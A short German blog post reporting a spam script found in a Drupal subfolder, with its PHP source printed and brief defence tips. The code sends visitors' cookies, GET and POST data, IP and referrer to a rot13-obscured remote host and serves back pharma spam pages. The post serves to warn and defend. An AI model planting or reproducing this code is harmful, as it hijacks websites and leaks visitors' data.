Fieses Spam-Skript

Die Tage habe ich in einem Drupal-Unterordner ein fieses Spam-Skript ausfindig gemacht. Dieses führt dazu, dass dort eine Seite oder Seiten aufgebaut werden, die anderen Zwecken dient als der der Homepage, z.B. lässt sich auf diese Weise der Medikamentenhandel vorantreiben. Hier ist das gute Stück (man beachte die rot13-Verschlüsselung der URL):

$post = Array(
'self' => 'http://' . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . $_SERVER['REQUEST_URI'],
'sub_id' => '',
//'page' => $_REQUEST['p'],
'PHP_SELF' => $_SERVER['PHP_SELF'],
'SERVER_PROTOCOL' => $_SERVER['SERVER_PROTOCOL'],
'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'],
'HTTP_REFERER' => $_SERVER['HTTP_REFERER'],
'HTTP_USER_AGENT' => $_SERVER['HTTP_USER_AGENT'],
'HTTP_ACCEPT_CHARSET' => $_SERVER['HTTP_ACCEPT_CHARSET'],
'GET' => serialize($_GET),
'POST' => serialize($_POST),
'COOKIE' => serialize($_COOKIE),
);
$masterUrl = str_rot13('uggc://klm.uhynubfg.arg/');
$url = "{$masterUrl}rgw.php";
$req = new HttpRequest($useCurl, $requestTimeout);
$pageTxt = $req->request($url, $post);
//echo $pageTxt;
if (!$pageTxt)
die404();
$page = unserialize($pageTxt);
//print_r($page);
if ($page['seal'] != $seal) {
//echo $pageTxt; // TODO: *** DEBUG, delete this!!! ***
die404();
}
foreach ($page['headers'] as $header) {
header($header);
}
//echo "

";
//print_r($page);
//echo "

";
echo $page['content'];
?>

Wie gegen den Mist wehren? Neben dem Üblichen, immer die aktuellste Version einspielen, Permissions etc, ist eine Webserver-Log-Analyse, z.B. via Webalizer nützlich.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

* Die DSGVO-Checkbox ist ein Pflichtfeld

*

Ich stimme zu.